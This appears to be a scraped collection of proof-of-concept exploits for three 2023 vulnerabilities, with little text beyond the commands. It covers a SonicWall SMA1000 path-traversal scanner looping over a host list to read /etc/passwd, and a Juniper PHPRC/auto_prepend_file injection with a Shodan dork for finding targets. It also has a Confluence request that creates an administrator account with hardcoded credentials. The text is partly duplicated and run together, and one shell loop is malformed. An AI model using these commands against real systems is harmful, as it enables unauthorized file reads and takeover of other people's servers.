CVE-2023-0126
SonicWall SMA1000
File Read Bug
POC:
SonicWall SMA1000
File Read Bug
POC:
cat file.txt| while read host do;do curl -sk "http://$host:8443/images//////////////////../../../../../../../../etc/passwd" | grep -i 'root:' && echo $host "is VULN";doneJuniper - Remote Code Execution ( CVE-2023-36845 )
Shodan Dork : noscript:"Juniper" http.favicon.hash:2141724739
Poc: curl <TARGET> -F $'auto_prepend_file="/etc/passwd\n"' -F 'PHPRC=/dev/fd/0'
Shodan Dork : noscript:"Juniper" http.favicon.hash:2141724739
Poc: curl <TARGET> -F $'auto_prepend_file="/etc/passwd\n"' -F 'PHPRC=/dev/fd/0'
CVE-2023-22515
Confluence Data Center and Server - Broken Access Control Vulnerability
POC:
login - adm1n/adm1n
Confluence Data Center and Server - Broken Access Control Vulnerability
POC:
curl -k -X POST -H "X-Atlassian-Token: no-check" --data-raw "username=adm1n&fullName=admin&email=admin@confluence&password=adm1n&confirm=adm1n&setup-next-button=Next" http://confluence/setup/setupadministrator.action login - adm1n/adm1n